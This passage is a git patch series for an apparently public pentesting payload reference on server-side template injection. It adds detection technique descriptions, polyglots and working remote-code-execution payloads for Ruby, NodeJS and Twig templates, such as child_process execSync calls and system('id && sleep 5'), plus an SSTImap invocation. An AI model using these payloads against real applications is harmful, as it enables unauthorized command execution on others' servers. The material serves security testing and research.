+- Rendered, Time-Based: [Server-Side Template Injection: RCE For The Modern Web App - James Kettle - August 05, 2015](https://portswigger.net/knowledgebase/papers/serversidetemplateinjection.pdf)
+- Polyglot-Based: [Improving the Detection and Identification of Template Engines for Large-Scale Template Injection Scanning - Maximilian Hildebrand - September 19, 2023](https://www.hackmanit.de/images/download/thesis/Improving-the-Detection-and-Identification-of-Template-Engines-for-Large-Scale-Template-Injection-Scanning-Maximilian-Hildebrand-Master-Thesis-Hackmanit.pdf)
+- Error-Based, Boolean-Based: [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
+
+#### Rendered
+
+![Rendered technique workflow](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Images/technique_Rendered.png?raw=true)
+
+> Applicability: detection, exploitation
+
+When the rendered template is displayed to the attacker, Rendered technique can be used to include the results of the injected code on the page.
+
+#### Error-Based
+
+![Error-Based technique workflow](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Images/technique_Error-Based.png?raw=true)
+
+> Applicability: detection, exploitation
+
+When the errors are verbosely displayed to the attacker, Error-Based technique can be used to trigger the error message containing the results of the injected code.
+
+#### Boolean-Based
+
+![Boolean-Based technique workflow](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Images/technique_Boolean-Based.png?raw=true)
+
+> Applicability: detection, blind exploitation, blind data exfiltration
+
+Boolean-Based technique can be used to conditionally trigger an error to indicate success or failure of the injected code.
+
+#### Time-Based
+
+![Time-Based technique workflow](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Images/technique_Time-Based.png?raw=true)
+
+> Applicability: limited detection, blind exploitation, blind data exfiltration
+
+Time-Based technique can be used to conditionally trigger the delay to indicate success or failure of the injected code.
+
+Triggering the delay often requires guessing payloads for code evaluation or OS command execution.
+
+#### Out of Bounds
+
+> Applicability: limited detection, exploitation
+
+Out of Bounds technique can be used to expose results of the injected code through other channels (e.g. by connecting to an attacker-controlled server).
+
+This technique often requires guessing payloads for code evaluation or OS command execution.
+
+#### Polyglot-Based
+
+![Polyglot-Based technique workflow](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Images/technique_Polyglot-Based.png?raw=true)
+
+> Applicability: detection
+
+Polyglot-Based technique can be used to quickly determine the template engine by checking how it transforms different payloads.
+
+### Universal Detection Payloads
+
+Polyglot to trigger an error in presence of SSTI vulnerability:
+
+```ps1
+${{<%[%'"}}%\.
+```
+
+Common tags to test for SSTI with code evaluation:
+
+```
+{{ ... }}
+${ ... }
+#{ ... }
+<%= ... %>
+{ ... }
+{{= ... }}
+{= ... }
+\n= ... \n
+*{ ... }
+@{ ... }
+@( ... )
+```
+
+Rendered SSTI can be checked by using mathematical expressions inside the tags:
+
+```
+7 * 7
+```
+
+Error-Based SSTI can be checked by using this payload inside the tags:
+
+```
+(1/0).zxy.zxy
+```
+
+If the error caused by that payload is displayed verbosely, it can be checked to guess the language used for code evaluation:
+
+| Error                         | Language          |
+|-------------------------------|-------------------|
+| ZeroDivisionError             | Python            |
+| java.lang.ArithmeticException | Java              |
+| ReferenceError                | NodeJS            |
+| TypeError                     | NodeJS            |
+| Division by zero              | PHP               |
+| DivisionByZeroError           | PHP               |
+| divided by 0                  | Ruby              |
+| Arithmetic operation failed   | Freemarker (Java) |
+
+To test for blind injections using Boolean-Based technique, the attacker can test pairs of similar payloads wrapped in tags, where one payload evaluates mathematical expression, while the other triggers syntax error:
+
+| test | ok              | error           |
+|------|-----------------|-----------------|
+| 1    | `(3*4/2)`       | `3*)2(/4`       |
+| 2    | `((7*8)/(2*4))` | `7)(*)8)(2/(*4` |
+
+Using at least two pairs of payloads avoids false positives caused by external interference.
+
+### Manual Detection and Exploitation
+
+#### Identify the Vulnerable Input Field
 
 The attacker first locates an input field, URL parameter, or any user-controllable part of the application that is passed into a server-side template without proper sanitization or escaping.
 
@@ -48,7 +175,7 @@ For example, the attacker might identify a web form, search bar, or template pre
 
 **TIP**: Generated PDF files, invoices and emails usually use a template.
 
-### Inject Template Syntax
+#### Inject Template Syntax
 
 The attacker tests the identified input field by injecting template syntax specific to the template engine in use. Different web frameworks use different template engines (e.g., Jinja2 for Python, Twig for PHP, or FreeMarker for Java).
 
@@ -69,7 +196,7 @@ ${{<%[%'"}}%\.
 
 The [Hackmanit/Template Injection Table](https://github.com/Hackmanit/template-injection-table) is an interactive table containing the most efficient template injection polyglots along with the expected responses of the 44 most important template engines.
 
-### Enumerate the Template Engine
+#### Enumerate the Template Engine
 
 Based on the successful response, the attacker determines which template engine is being used. This step is critical because different template engines have different syntax, features, and potential for exploitation. The attacker may try different payloads to see which one executes, thereby identifying the engine.
 
@@ -79,7 +206,7 @@ Based on the successful response, the attacker determines which template engine
 
 [The post "template-engines-injection-101" from @0xAwali](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756) summarize the syntax and detection method for most of the template engines for JavaScript, Python, Ruby, Java and PHP and how to differentiate between engines that use the same syntax.
 
-### Escalate to Code Execution
+#### Escalate to Code Execution
 
 Once the template engine is identified, the attacker injects more complex expressions, aiming to execute server-side commands or arbitrary code.
 
@@ -91,6 +218,9 @@ Once the template engine is identified, the attacker injects more complex expres
 
 ## References
 
+- [Server-Side Template Injection: RCE For The Modern Web App - James Kettle - August 05, 2015](https://portswigger.net/knowledgebase/papers/serversidetemplateinjection.pdf)
+- [Improving the Detection and Identification of Template Engines for Large-Scale Template Injection Scanning - Maximilian Hildebrand - September 19, 2023](https://www.hackmanit.de/images/download/thesis/Improving-the-Detection-and-Identification-of-Template-Engines-for-Large-Scale-Template-Injection-Scanning-Maximilian-Hildebrand-Master-Thesis-Hackmanit.pdf)
+- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
 - [A Pentester's Guide to Server Side Template Injection (SSTI) - Busra Demir - December 24, 2020](https://www.cobalt.io/blog/a-pentesters-guide-to-server-side-template-injection-ssti)
 - [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - August 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9)
 - [Template Engines Injection 101 - Mahmoud M. Awali - November 1, 2024](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756)
diff --git a/Server Side Template Injection/Ruby.md b/Server Side Template Injection/Ruby.md
index d7c2615ff9..1d742f416d 100644
--- a/Server Side Template Injection/Ruby.md	
+++ b/Server Side Template Injection/Ruby.md	
@@ -5,6 +5,7 @@
 ## Summary
 
 - [Templating Libraries](#templating-libraries)
+- [Universal Payloads](#universal-payloads)
 - [Ruby](#ruby)
     - [Ruby - Basic injections](#ruby---basic-injections)
     - [Ruby - Retrieve /etc/passwd](#ruby---retrieve-etcpasswd)
@@ -15,14 +16,27 @@
 ## Templating Libraries
 
 | Template Name | Payload Format |
-| ------------ | --------- |
-| Erb      | `<%= %>`   |
-| Erubi    | `<%= %>`   |
-| Erubis   | `<%= %>`   |
-| HAML     | `#{ }`     |
-| Liquid   | `{{ }}`    |
-| Mustache | `{{ }}`    |
-| Slim     | `#{ }`     |
+|---------------|----------------|
+| Erb           | `<%= %>`       |
+| Erubi         | `<%= %>`       |
+| Erubis        | `<%= %>`       |
+| HAML          | `#{ }`         |
+| Liquid        | `{{ }}`        |
+| Mustache      | `{{ }}`        |
+| Slim          | `#{ }`         |
+
+## Universal Payloads
+
+Generic code injection payloads work for many Ruby-based template engines, such as Erb, Erubi, Erubis, HAML and Slim.
+
+To use these payloads, wrap them in the appropriate tag.
+
+```ruby
+%x('id') # Rendered RCE
+File.read("Y:/A:/"+%x('id')) # Error-Based RCE
+1/(system("id")&&1||0) # Boolean-Based RCE
+system("id && sleep 5") # Time-Based RCE
+```
 
 ## Ruby
 
@@ -74,3 +88,4 @@ Execute code using SSTI for **Slim** engine.
 ## References
 
 - [Ruby ERB Template Injection - Scott White & Geoff Walton - September 13, 2017](https://web.archive.org/web/20181119170413/https://www.trustedsec.com/2017/09/rubyerb-template-injection/)
+- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)

From abbbf2fc95def1a82d6c4f87c772dbe405c7e199 Mon Sep 17 00:00:00 2001
From: vladko312 <vladko312@gmail.com>
Date: Sat, 3 Jan 2026 18:43:24 +0300
Subject: [PATCH 2/5] SSTI: - Fixed NodeJS payloads

---
 Server Side Template Injection/JavaScript.md | 12 +++++++-----
 1 file changed, 7 insertions(+), 5 deletions(-)

diff --git a/Server Side Template Injection/JavaScript.md b/Server Side Template Injection/JavaScript.md
index f317f735bf..4568a7197c 100644
--- a/Server Side Template Injection/JavaScript.md	
+++ b/Server Side Template Injection/JavaScript.md	
@@ -41,17 +41,17 @@ To use these payloads, wrap them in the appropriate tag.
 
 ```javascript
 // Rendered RCE
-require("child_process").execSync("id")
+global.process.mainModule.require("child_process").execSync("id")
 
 // Error-Based RCE
-require("Y:/A:/"+require("child_process").execSync("id"))
-""["x"][require("child_process").execSync("id")]
+global.process.mainModule.require("Y:/A:/"+global.process.mainModule.require("child_process").execSync("id"))
+""["x"][global.process.mainModule.require("child_process").execSync("id")]
 
 // Boolean-Based RCE
-[""][0 + !(require("child_process").spawnSync("id", options={shell:true}).status===0)]["length"]
+[""][0 + !(global.process.mainModule.require("child_process").spawnSync("id", options={shell:true}).status===0)]["length"]
 
 // Time-Based RCE
-require("child_process").execSync("id && sleep 5")
+global.process.mainModule.require("child_process").execSync("id && sleep 5")
 ```
 
 NunjucksJS is also capable of executing these payloads using `{{range.constructor(' ... ')()}}`.
@@ -149,6 +149,8 @@ ${= _.VERSION}
 
 ## Pug
 
+> Universal payloads also work for Pug.
+
 [Official website](https://pugjs.org/api/getting-started.html)
 >
 

From 09a5f07345201adda5cd35c339e23979b293c2bc Mon Sep 17 00:00:00 2001
From: vladko312 <vladko312@gmail.com>
Date: Sat, 3 Jan 2026 22:20:19 +0300
Subject: [PATCH 3/5] SSI, SSTI: - Improved MarkDown

---
 Server Side Include Injection/README.md  |  2 +-
 Server Side Template Injection/Java.md   |  2 +-
 Server Side Template Injection/PHP.md    |  1 +
 Server Side Template Injection/README.md | 12 ++++++------
 4 files changed, 9 insertions(+), 8 deletions(-)

diff --git a/Server Side Include Injection/README.md b/Server Side Include Injection/README.md
index 5880147ec8..9826857903 100644
--- a/Server Side Include Injection/README.md	
+++ b/Server Side Include Injection/README.md	
@@ -11,7 +11,7 @@
 
 ## Tools
 
-- [vladko312/SSTImap](https://github.com/vladko312/SSTImap) - Automatic SSTI detection tool with interactive interface based on [epinna/tplmap](https://github.com/epinna/tplmap), supports SSI detection and exploitation with `--legacy` or `-e SSI`
+* [vladko312/SSTImap](https://github.com/vladko312/SSTImap) - Automatic SSTI detection tool with interactive interface based on [epinna/tplmap](https://github.com/epinna/tplmap), supports SSI detection and exploitation with `--legacy` or `-e SSI`
 
   ```bash
   python3 ./sstimap.py -u 'https://example.com/page?name=John' --legacy -s
diff --git a/Server Side Template Injection/Java.md b/Server Side Template Injection/Java.md
index 2bd3c48441..f261d791d2 100644
--- a/Server Side Template Injection/Java.md	
+++ b/Server Side Template Injection/Java.md	
@@ -54,7 +54,7 @@
 
 ### Java EL - Basic Injection
 
-> Java has multiple Expression Languages using similar syntax.
+Java has multiple Expression Languages using similar syntax.
 
 > Multiple variable expressions can be used, if `${...}` doesn't work try `#{...}`, `*{...}`, `@{...}` or `~{...}`.
 
diff --git a/Server Side Template Injection/PHP.md b/Server Side Template Injection/PHP.md
index 299bbc18a2..11caee80a3 100644
--- a/Server Side Template Injection/PHP.md	
+++ b/Server Side Template Injection/PHP.md	
@@ -167,6 +167,7 @@ $output = $twig > render (
 ```
 
 With certain settings, Twig interrupts rendering, if any errors or warnings are raised. This payload works fine in these cases:
+
 ```php
 {{ {'id':'shell_exec'}|map('call_user_func')|join }}
 ```
diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index 5d7e34a2e9..1b0b4af792 100644
--- a/Server Side Template Injection/README.md	
+++ b/Server Side Template Injection/README.md	
@@ -53,9 +53,9 @@
 
 Original research:
 
-- Rendered, Time-Based: [Server-Side Template Injection: RCE For The Modern Web App - James Kettle - August 05, 2015](https://portswigger.net/knowledgebase/papers/serversidetemplateinjection.pdf)
-- Polyglot-Based: [Improving the Detection and Identification of Template Engines for Large-Scale Template Injection Scanning - Maximilian Hildebrand - September 19, 2023](https://www.hackmanit.de/images/download/thesis/Improving-the-Detection-and-Identification-of-Template-Engines-for-Large-Scale-Template-Injection-Scanning-Maximilian-Hildebrand-Master-Thesis-Hackmanit.pdf)
-- Error-Based, Boolean-Based: [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
+* Rendered, Time-Based: [Server-Side Template Injection: RCE For The Modern Web App - James Kettle - August 05, 2015](https://portswigger.net/knowledgebase/papers/serversidetemplateinjection.pdf)
+* Polyglot-Based: [Improving the Detection and Identification of Template Engines for Large-Scale Template Injection Scanning - Maximilian Hildebrand - September 19, 2023](https://www.hackmanit.de/images/download/thesis/Improving-the-Detection-and-Identification-of-Template-Engines-for-Large-Scale-Template-Injection-Scanning-Maximilian-Hildebrand-Master-Thesis-Hackmanit.pdf)
+* Error-Based, Boolean-Based: [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
 
 #### Rendered
 
@@ -117,7 +117,7 @@ ${{<%[%'"}}%\.
 
 Common tags to test for SSTI with code evaluation:
 
-```
+```powershell
 {{ ... }}
 ${ ... }
 #{ ... }
@@ -133,13 +133,13 @@ ${ ... }
 
 Rendered SSTI can be checked by using mathematical expressions inside the tags:
 
-```
+```powershell
 7 * 7
 ```
 
 Error-Based SSTI can be checked by using this payload inside the tags:
 
-```
+```powershell
 (1/0).zxy.zxy
 ```
 

From bec6524774724cbe859f0aab1f24491961f9e520 Mon Sep 17 00:00:00 2001
From: vladko312 <vladko312@gmail.com>
Date: Sat, 3 Jan 2026 23:19:26 +0300
Subject: [PATCH 4/5] SSTI: - Fixed NodeJS payloads

---
 Server Side Template Injection/JavaScript.md | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/Server Side Template Injection/JavaScript.md b/Server Side Template Injection/JavaScript.md
index 4568a7197c..8e8d861c64 100644
--- a/Server Side Template Injection/JavaScript.md	
+++ b/Server Side Template Injection/JavaScript.md	
@@ -41,17 +41,17 @@ To use these payloads, wrap them in the appropriate tag.
 
 ```javascript
 // Rendered RCE
-global.process.mainModule.require("child_process").execSync("id")
+global.process.mainModule.require("child_process").execSync("id").toString()
 
 // Error-Based RCE
-global.process.mainModule.require("Y:/A:/"+global.process.mainModule.require("child_process").execSync("id"))
-""["x"][global.process.mainModule.require("child_process").execSync("id")]
+global.process.mainModule.require("Y:/A:/"+global.process.mainModule.require("child_process").execSync("id").toString())
+""["x"][global.process.mainModule.require("child_process").execSync("id").toString()]
 
 // Boolean-Based RCE
 [""][0 + !(global.process.mainModule.require("child_process").spawnSync("id", options={shell:true}).status===0)]["length"]
 
 // Time-Based RCE
-global.process.mainModule.require("child_process").execSync("id && sleep 5")
+global.process.mainModule.require("child_process").execSync("id && sleep 5").toString()
 ```
 
 NunjucksJS is also capable of executing these payloads using `{{range.constructor(' ... ')()}}`.

From 08b5c4c868fd4a8f5ac02f91ec276e953e3b1ca0 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sat, 3 Jan 2026 22:50:37 +0100
Subject: [PATCH 5/5] Unordered list style [Expected: dash; Actual: asterisk]

---
 Server Side Template Injection/README.md | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index 1b0b4af792..e935fe6551 100644
--- a/Server Side Template Injection/README.md	
+++ b/Server Side Template Injection/README.md	
@@ -53,9 +53,9 @@
 
 Original research:
 
-* Rendered, Time-Based: [Server-Side Template Injection: RCE For The Modern Web App - James Kettle - August 05, 2015](https://portswigger.net/knowledgebase/papers/serversidetemplateinjection.pdf)
-* Polyglot-Based: [Improving the Detection and Identification of Template Engines for Large-Scale Template Injection Scanning - Maximilian Hildebrand - September 19, 2023](https://www.hackmanit.de/images/download/thesis/Improving-the-Detection-and-Identification-of-Template-Engines-for-Large-Scale-Template-Injection-Scanning-Maximilian-Hildebrand-Master-Thesis-Hackmanit.pdf)
-* Error-Based, Boolean-Based: [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
+- Rendered, Time-Based: [Server-Side Template Injection: RCE For The Modern Web App - James Kettle - August 05, 2015](https://portswigger.net/knowledgebase/papers/serversidetemplateinjection.pdf)
+- Polyglot-Based: [Improving the Detection and Identification of Template Engines for Large-Scale Template Injection Scanning - Maximilian Hildebrand - September 19, 2023](https://www.hackmanit.de/images/download/thesis/Improving-the-Detection-and-Identification-of-Template-Engines-for-Large-Scale-Template-Injection-Scanning-Maximilian-Hildebrand-Master-Thesis-Hackmanit.pdf)
+- Error-Based, Boolean-Based: [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md)
 
 #### Rendered